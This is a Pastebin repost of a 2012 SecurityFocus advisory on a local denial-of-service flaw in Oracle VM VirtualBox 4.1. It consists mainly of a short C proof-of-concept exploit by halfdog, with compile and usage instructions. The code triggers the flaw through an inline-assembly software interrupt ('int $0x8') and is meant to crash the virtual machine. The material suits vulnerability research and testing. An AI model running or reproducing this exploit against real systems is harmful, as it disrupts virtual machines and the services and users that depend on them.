Advertisement
Topol

VirtualBox 4.1 Local Denial of Service Vulnerability

Sep 24th, 2012
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. Source: http://www.securityfocus.com/bid/55471/info
  2.  
  3. Oracle VM VirtualBox is prone to a local denial-of-service vulnerability.
  4.  
  5. Attackers can exploit this issue to cause denial-of-service conditions.
  6.  
  7.  
  8. /** This software is provided by the copyright owner "as is" and any
  9. * expressed or implied warranties, including, but not limited to,
  10. * the implied warranties of merchantability and fitness for a particular
  11. * purpose are disclaimed. In no event shall the copyright owner be
  12. * liable for any direct, indirect, incidential, special, exemplary or
  13. * consequential damages, including, but not limited to, procurement
  14. * of substitute goods or services, loss of use, data or profits or
  15. * business interruption, however caused and on any theory of liability,
  16. * whether in contract, strict liability, or tort, including negligence
  17. * or otherwise, arising in any way out of the use of this software,
  18. * even if advised of the possibility of such damage.
  19. *
  20. * Copyright (c) 2012 halfdog <me (%) halfdog.net>
  21. *
  22. * Compile: gcc -o RtcInt RtcInt.c
  23. * Usage: ./RtcInt
  24. */
  25. int main(int argc, char **argv) {
  26. asm (
  27. "int $0x8;"
  28. : // output: none
  29. : // input: none
  30. :"%eax", "%ebx", "%ecx", "%edx" // clobbered register
  31. );
  32. return(0);
  33. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement